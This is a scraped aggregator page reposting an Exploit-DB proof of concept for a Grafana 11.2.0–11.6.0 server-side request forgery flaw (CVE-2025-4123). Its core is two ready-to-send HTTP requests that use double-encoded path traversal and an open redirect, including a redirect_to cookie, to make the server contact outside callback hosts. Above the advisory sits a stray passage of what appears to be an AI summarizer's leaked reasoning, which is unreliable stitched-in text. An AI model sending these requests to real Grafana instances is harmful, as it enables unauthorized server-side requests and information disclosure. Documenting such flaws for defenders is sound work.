[webapps] Grafana 11.6.0 - SSRF
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内,并且不需要特定的开头。首先,我看看文章的内容。 文章标题是Grafana 11.6.0的SSRF漏洞,提到了CVE编号。描述部分说明了漏洞的原因,是由于客户端路径遍历编码和开放重定向的结合。影响范围包括匿名访问或使用易受攻击插件的情况,可能导致服务器请求攻击者控制的主机或重定向,进而引发信息泄露。 POC部分展示了两个GET请求,带有特定的编码路径和参数。看起来这些请求用于触发漏洞。 接下来,我需要将这些信息浓缩到100字以内。重点包括:Grafana版本范围、SSRF漏洞、原因(路径遍历和重定向)、影响条件(匿名访问或插件)、攻击后果(信息泄露)。 现在组织语言:Grafana 11.2.0-11.6.0存在SSRF漏洞,因客户端路径遍历和开放重定向导致。在匿名访问或易受攻击插件启用时,攻击者可使服务器请求其控制的主机或引发重定向,导致信息泄露。 检查字数:刚好在限制内。确保没有使用“文章内容总结”之类的开头,直接描述内容。 </think> Grafana 11.2.0-11.6.0 存在 SSRF 漏洞,因客户端路径遍历和开放重定向导致。在匿名访问或易受攻击插件启用时,攻击者可使服务器请求其控制的主机或引发重定向,导致信息泄露。 2026-4-6 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:11 收藏

# Exploit Title: Grafana  11.6.0 - SSRF 
# FOFA: app="Grafana"
# Date: 2-11-2025
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download
# Version: 11.2.0 - 11.6.0
# CVE: CVE-2025-4123

Description:
An SSRF (Server-Side Request Forgery) vulnerability exists in Grafana's `render/public` (and related public rendering) endpoints owing to a combination of client-side path traversal encoding and an open redirect. Under certain configurations — especially when anonymous access or vulnerable plugins (e.g., Image Renderer) are enabled — an attacker can cause the server to perform requests to attacker-controlled hosts or induce redirections that lead to SSRF and subsequent information disclosure.

POC:
GET /render/public/..%252f%255Cczeqm5.dnslog.cn%252f%253F%252f..%252f.. HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Accept-Encoding: gzip

GET /public/..%2F%5c123.czeqm5.dnslog.cn%2F%3f%2F..%2F.. HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19
Connection: close
Cookie: redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cd0nt31pu8bl7cn5ncca08sg68smps8h39.oast.live%25252f%25253F%25252f..%25252f..
Accept-Encoding: gzip
            

文章来源: https://www.exploit-db.com/exploits/52491
如有侵权请联系:admin#unsafe.sh